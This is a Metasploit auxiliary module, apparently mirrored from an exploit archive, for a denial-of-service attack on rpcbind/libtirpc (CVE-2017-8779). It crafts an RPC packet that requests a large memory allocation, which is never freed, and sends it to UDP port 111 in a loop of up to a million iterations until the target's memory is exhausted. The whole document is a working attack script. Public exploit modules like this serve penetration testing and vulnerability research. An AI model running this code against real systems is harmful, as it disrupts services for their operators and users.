Share
## https://sploitus.com/exploit?id=PACKETSTORM:180538
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Dos  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::UDPScanner  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',  
'Description' => %q{  
This module exploits a vulnerability in certain versions of  
rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger  
large (and never freed) memory allocations for XDR strings on  
the target.  
},  
'Author' =>  
[  
'guidovranken', # original code  
'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'CVE', '2017-8779' ],  
[ 'BID', '98325' ],  
[ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]  
],  
'Disclosure Date' => 'May 03 2017'))  
  
register_options([  
Opt::RPORT(111),  
OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),  
OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])  
])  
end  
  
def scan_host(ip)  
pkt = [  
0, # xid  
0, # message type CALL  
2, # RPC version 2  
100000, # Program  
4, # Program version  
9, # Procedure  
0, # Credentials AUTH_NULL  
0, # Credentials length 0  
0, # Credentials AUTH_NULL  
0, # Credentials length 0  
0, # Program: 0  
0, # Ver  
4, # Proc  
4, # Argument length  
datastore['ALLOCSIZE'] # Payload  
].pack('N*')  
  
s = udp_socket(ip, datastore['RPORT'])  
count = 0  
while count < datastore['COUNT'] do  
begin  
s.send(pkt, 0)  
rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED  
vprint_error("Host #{ip} unreachable")  
break  
end  
count += 1  
end  
  
vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")  
end  
end